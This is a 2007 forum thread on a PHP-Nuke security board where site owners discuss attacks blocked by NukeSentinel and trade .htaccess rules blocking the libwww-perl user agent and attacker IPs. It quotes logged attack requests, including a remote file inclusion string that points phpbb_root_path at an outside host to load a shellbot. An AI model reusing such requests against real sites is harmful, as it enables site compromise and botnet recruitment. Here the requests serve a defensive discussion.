Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
selma
Hangin' Around



Joined: May 09, 2006
Posts: 31

PostPosted: Thu Jun 14, 2007 6:48 pm Reply with quote

Does anyone know what this is?

Just an information question since my updated NS blocked about 30 attacks with the following string, using different ip's today.

This is the string, with the domain left off, since this is my oldest site and it seems to attract every type of mal intent. It's just a non profit festival site - nothing involving money, though it has always had a problem with email hijackers sending pump and dumps, watch sales and viagra mail. Until the recent upgrade. Not sure if it's over, but quiet so far.

Query
//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.freewebtown.com/sclipici/evilx??

Get String: //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.freewebtown.com/sclipici/evilx??

Post String:
//modules/Forums/admin/admin_styles.php



And ...

My forums module is inactive. Without Sentinel, could this query have worked?


Ok, one more...

What type of exploit or attack is this used for?


Thanks in advance,

Selma
 
View user's profile Send private message
evaders99
Former Moderator in Good Standing



Joined: Apr 30, 2004
Posts: 3221

PostPosted: Thu Jun 14, 2007 8:52 pm Reply with quote

It's a standard "Remote File Inclusion" ... this is a known exploit against older versions of phpNuke and its being used by numerous botnets. The script itself allows the hacker to check for vulnerabilities and load a shellbot script to connect to his botnet. If sucessful, he can use the compromised machine to target others.

_________________
- Star Wars Rebellion Network -

Need help? Nuke Patched Core, Coding Services, Webmaster Services 
View user's profile Send private message Visit poster's website
selma







PostPosted: Fri Jun 15, 2007 9:16 am Reply with quote

Thanks for that answer, Evaders99

If I'm not careful, I could get addicted to NS and how it works.

But I guess in the wide world of addictions, that one wouldn't be so bad.

Have a good day

Selma
 
evaders99







PostPosted: Fri Jun 15, 2007 6:07 pm Reply with quote

Block libwww-perl using .htaccess and that will take out 99.9% of these attempts Smile
 
Gremmie
Former Moderator in Good Standing



Joined: Apr 06, 2006
Posts: 2415
Location: Iowa, USA

PostPosted: Fri Jun 15, 2007 6:31 pm Reply with quote

This is what I use for that. I have this at the bottom of my .htaccess file:

Quote:

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
RewriteRule ^.*$ [ Only registered users can see links on this board! Get registered or login! ] [R,L]


I tested it by writing a perl script that tries to browse my site and it worked. Smile

_________________
GCalendar - An Event Calendar for PHP-Nuke
Member_Map - A Google Maps Nuke Module 
View user's profile Send private message
selma







PostPosted: Fri Jun 15, 2007 8:16 pm Reply with quote

I really can't believe how helpful everyone is around here.

Couple of years ago, I paid more than $600 for a program, that the developer installed - in the wrong folder, so it wouldn't work. Had to stay up til midnight everynight for about three weeks to catch them to continually do fixes, because they were based in India. The code was all encrypted and I finally just scrapped it for another program.

You all are WAAAAAYYYYYY better than them!

Thanks Very Happy Selma
 
wiz
Involved
Involved



Joined: Oct 09, 2006
Posts: 413
Location: UK

PostPosted: Fri Jun 15, 2007 9:25 pm Reply with quote

always search what you can for free, then you will inevitably come across goldmine websites like this one
 
View user's profile Send private message Visit poster's website AIM Address
montego
Site Admin



Joined: Aug 29, 2004
Posts: 9457
Location: Arizona

PostPosted: Sat Jun 16, 2007 1:35 pm Reply with quote

Just remember that it costs someone, Raven, money to run this site. If we don't support him through donations, these doors end up closing too. Every little bit helps. He, and others here, helped me out alot too when I first started and so I became "hooked". Now, I get a chance to do my part by helping others too.

_________________
Where Do YOU Stand?
HTML Newsletter::ShortLinks::Mailer::Downloads and more... 
View user's profile Send private message Visit poster's website
elric
New Member
New Member



Joined: Jun 15, 2007
Posts: 13

PostPosted: Sat Jun 16, 2007 2:17 pm Reply with quote

Gremmie wrote:
This is what I use for that. I have this at the bottom of my .htaccess file:

Quote:

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
RewriteRule ^.*$ [ Only registered users can see links on this board! Get registered or login! ] [R,L]


I tested it by writing a perl script that tries to browse my site and it worked. Smile


I have been getting these attacks for the last week or so,
would the following .htaccess be the correct way of adding your code?
Code:


RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/[0-9].[0-9]*
RewriteRule ^.*$ http://127.0.0.1 [R,L]
RewriteCond %{HTTP_HOST} !^www\.
RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]
<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from 200.150.35.165
deny from 69.243.47.54
deny from 68.34.112.209
deny from 71.114.62.162
deny from 69.243.44.134
deny from 69.243.45.51
deny from 24.55.180.176
deny from 71.114.65.115
deny from 208.31.155.254
deny from 82.146.165.139

RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/[0-9].[0-9]*
RewriteRule ^.*$ http://127.0.0.1 [R,L]


Also, I hope you don't mind but is there any chance you could allow me a copy of your script, Id like to test mine.

Wink
 
View user's profile Send private message
Gremmie







PostPosted: Sat Jun 16, 2007 9:15 pm Reply with quote

Well I dunno if yours will work or not since I barely understand the rewrite engine...

But here is the Perl script. I got it from the 'net somewhere...

Code:


#!/usr/bin/perl
# Simple LWP browser for testing
use LWP::UserAgent;

$ua = LWP::UserAgent->new;

$req = HTTP::Request->new(GET => 'http://www.yoursite.com/');
$req->header('Accept' => 'text/html');

# send request
$res = $ua->request($req);

# check the outcome
if ($res->is_success)
{
   print $res->content;
}
else
{
   print "Error: " . $res->status_line . "\n";
}
 
elric







PostPosted: Sun Jun 17, 2007 1:35 pm Reply with quote

Thanks

Been searching around and found this .htaccess generator, it does not do everything but it's pretty neat. [ Only registered users can see links on this board! Get registered or login! ]

I have also now uncovered more questions,
How to incorperate the above and also the sentinel code?

So far I have this
Code:
RewriteEngine On

RewriteCond %{HTTP_HOST} !^www\.
RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]

RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
RewriteRule ^.*$ http://127.0.0.1 [R,L]

<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from 200.150.35.165
deny from 69.243.47.54
deny from 68.34.112.209
deny from 71.114.62.162
deny from 69.243.44.134
deny from 69.243.45.51
deny from 24.55.180.176
deny from 71.114.65.115
deny from 208.31.155.254
deny from 82.146.165.139

# -------------------------------------------
# Start of NukeSentinel(tm) admin.php Auth
# -------------------------------------------
<Files .ftaccess>
  deny from all
</Files>

<Files .staccess>
  deny from all
</Files>

<Files admin.php>
   <Limit GET POST PUT>
      require valid-user
   </Limit>
   AuthName "Restricted"
   AuthType Basic
   AuthUserFile   /path/to/your/.staccess
</Files>

# -------------------------------------------
# Start of NukeSentinel(tm) DENY FROM area
# -------------------------------------------


Can anyone with more knowledge than me (that's not hard) tell me if they can see any errors?
 
selma







PostPosted: Tue Jun 19, 2007 9:19 am Reply with quote

montego wrote:
Just remember that it costs someone, Raven, money to run this site. If we don't support him through donations, these doors end up closing too. Every little bit helps. He, and others here, helped me out alot too when I first started and so I became "hooked". Now, I get a chance to do my part by helping others too.


Glad you brought up that point, Montego. I've been thinking about that for the past couple of days.

I see that Raven asks for a combined total of 400 a month... Which is a pittance IMO.

I have to admit to being a spastic donator, once every few months or so. But I mentioned somewhere else that since starting my first for profit site, I intend to include RN in the monthly budget as a regular expense.

If there are 15,000 users plus and a third are regular users...

What would a good "support" donation be? Support to the point that the ecommerce module and some other major revision work that's talked about on the forum could be done?

During those couple of days referred to earlier, this thought's been running through my mind.

A donation from a few people of $50 adds up to a couple hundred dollars.

But... suppose "someone" (church lingo for "the person who suggested it") organized a type of pledge drive based on the fact that thousands of people use the scripts and tools and many actually depend on what you do to keep their start ups running efficiently.

Then suppose that 5,000 of the 15,000 would agree to pledge $5 per month.

Going a step beyond your donation mod, there could be a Supporters Hall where the name of the business or the person could be posted with a link - or something else clever that everyone would be dying to get their name or business posted to... Maybe a "Support Where it Counts" kind of button for webs.

Without getting way off track, 5,000 people at $5 a month is enough to keep a few staff members secure.

I love organizing and I certainly wouldn't mind putting some work into this kind of effort, and I think I still have free time between 5 - 6 am LOL

So, tell me your thoughts.


... And, noob alert:

Code:
RewriteCond %{HTTP_HOST} !^www\.

RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]


What does this part of that code do?

I added the previous three lines of the code from Gremmie the other day, and haven't gotten any more attacks - thank you very much.

I understand what the code does, but I don't know how it does, if that makes sense - or, is that part of your testing code or the cooletips engine coding?

... And

Can you put the "libwww-perl" into the string, or script or referrer blocker in Sentinel?

Thanks in advance,

Selma
 
Gremmie







PostPosted: Tue Jun 19, 2007 9:48 am Reply with quote

It is easy for Perl programmers to forge the user agent. I am now seeing similar attacks on my site. It looks like the same scripts but now the user agent says Mozilla instead of libwww-perl. But Sentinel is stopping them.

That code looks like like it is rewriting mysite.com into [ Only registered users can see links on this board! Get registered or login! ]
 
selma







PostPosted: Tue Jun 19, 2007 9:55 am Reply with quote

Got it Smile

Thanks
 
elric







PostPosted: Tue Jun 26, 2007 2:45 pm Reply with quote

Thanks Gremmie,
And thanks for answering my next question before I'd even asked it.
I am no longer seeing the perl attacks but like you I have seen about 3 MoZilla/4.0 attacks and like you say, sentinel is stopping them.
The latest points to the script below. [ Only registered users can see links on this board! Get registered or login! ]
 
Gremmie







PostPosted: Tue Jun 26, 2007 5:46 pm Reply with quote

It is easy to modify that Perl script to change the user agent part of the header. The LWP module supports that.
 
elric







PostPosted: Wed Jul 04, 2007 2:30 pm Reply with quote

And it certainly looks like that has been done, I am not getting any attacks with User Agent: perl but now I am getting attacks like User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR

About 3 or 4 nearly every day.
a lot similar to the following

Code:
www.mysite/modules.php?name=Forums&file=posting&mode=newtopic&f=1+[PLM=0]+GET+http://www.mysite/modules.php?name=Forums+[0,9018,76382]+->+[L]+POST+http://www.mysite/modules.php?name=Your_Account+[0,0,60072]+->+[N]+GET+http://www.mysite/modules.php?name=Forums&file=viewforum&f=1+[0,0,124857]+->+[N]+GET+http://www.mysite/modules.php?name=Forums&file=posting&mode=newtopic&f=1+[0,43072,59023]+->+[N]+POST+http://www.ffclan.us/modules.php?name=Forums&file=posting+[0,0,37628]

Get String: [ Only registered users can see links on this board! Get registered or login! ] [0,0,37628]&mode=newtopic&f=1 [0,43072,59023] -> [N] POST http://www.mysite/modules.php?name=Forums
Post String: [ Only registered users can see links on this board! Get registered or login! ]

Forwarded For: none
Client IP: none
Remote Address: 65.96.84.33
Remote Port: 1950
Request Method: GET

What I can't understand is why my site seems to be a target, where as here for example has a mere 11 attacks blocked compared to my currently 84, my site has way less traffic and I would certainly believe a much lower search engine rating.
Anyone know how targets are picked, I am guessing via a search engine.
 
selma







PostPosted: Thu Jul 05, 2007 12:44 pm Reply with quote

Quote:
What I can't understand is why my site seems to be a target, where as here for example has a mere 11 attacks blocked compared to my currently 84,


Hey Elric, Thought I was the only one they targeted for no good darn reason. Figured they probably know they can't get into Raven's site.

My site is a local arts organization. Nothing real exciting to want to break into. But one thing I did find out was that spammers especially, like to use the address of "trusted" sites to send their mail from. It means less bounces for them because the "trusted" address they are spoofing will get through most spam filters - by IP address anyway.

So maybe your search engine theory is right. Good search position = trusted site.?.?

Still can't figure out why anyone else would want to get in though.
 
fkelly
Former Moderator in Good Standing



Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY

PostPosted: Thu Jul 05, 2007 1:44 pm Reply with quote

Quote:
Still can't figure out why anyone else would want to get in though.


Cause they are idiots and don't know or care what they are hacking. They just search for sites randomly and try various forms of attack and if they can hack you they get their jollies. So to speak. Don't try to attribute rationality to it. Just defend yourself as best you can.
 
View user's profile Send private message Visit poster's website
selma







PostPosted: Thu Jul 05, 2007 3:06 pm Reply with quote

"Cause they are idiots and don't know or care what they are hacking."

Agreed!

They need some kids and bills and stuff. Give em something to do!

Anybody seen this one? Only ask because this sites been getting hit with all types of mail that I know is blocked. Which leads me to believe this sender has access somewhere I can't see.

mail came from ...



Received: from word9 ([127.0.0.1]) by writely.com with Microsoft SMTPSVC(6.0.3790.1830);
Fri, 06 Jul 2007 04:14:56 +0800
Message-Id: <9.0.9.1.3.97943802796608.0[3



No subject, body-message, or return sender in the actual letter. Just a blank mail. And that is the end of the header

Received: from word9 ([127.0.0.1]) This part looks like they are in my control panel and sending from there.

Freaky
 
Susann
Moderator



Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support

PostPosted: Thu Jul 05, 2007 3:16 pm Reply with quote

Agreed the most are idiots especially those script kiddies wich just copy and paste some code. I have met different types of them online and talked back.
The most are young and they don´t know the difference between crime and fun.
I could write a book about these stories but I don´t publish something like that. Its in my memory thats enough. Smile
My last meeting was also funny. Someone registered new and in the meantime while he was in his store his friend played with his PC and tried to hack my site.
The new registered didn´t know why he suddenly couldn´t post in my forum anymore after he came back from his store.Thats just one little funny story from my board.
But there are others too and they are really dangerous because they have the knowledge and the money to do these things like Botnets etc.
However, currently are iframes very popular.
For example google for: hacked by [ Only registered users can see links on this board! Get registered or login! ]

German Nuke sites and phpBB boards are already hacked by them.
 
View user's profile Send private message
elric







PostPosted: Fri Jul 06, 2007 4:30 pm Reply with quote

Thanks for all your posts, for information I'm now at 94 attacks. I agree with all your coments but I just feel it's more than random.
I have even googled my site url in the hope of finding it posted in a security site with the "bet you can't hack me" type thing but to no avail.
 
selma







PostPosted: Mon Jul 09, 2007 2:58 pm Reply with quote

Posted here: Union + nuke_authors
[ Only registered users can see links on this board! Get registered or login! ]


Last edited by selma on Mon Jul 09, 2007 4:05 pm; edited 1 time in total 
selma







PostPosted: Mon Jul 09, 2007 3:44 pm Reply with quote

posted elsewhere -
 
elric







PostPosted: Fri Jul 13, 2007 2:16 pm Reply with quote

I'm not entirely sure what the link you supplied is telling me but It did highlight to me some of the comments posted to news topics, which contained spammage of links and all sorts of text, I have deleted these and I hope perhaps this will drop someof the search engines picking up on key words like an*l etc etc.

Once again Thank you for your help.
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©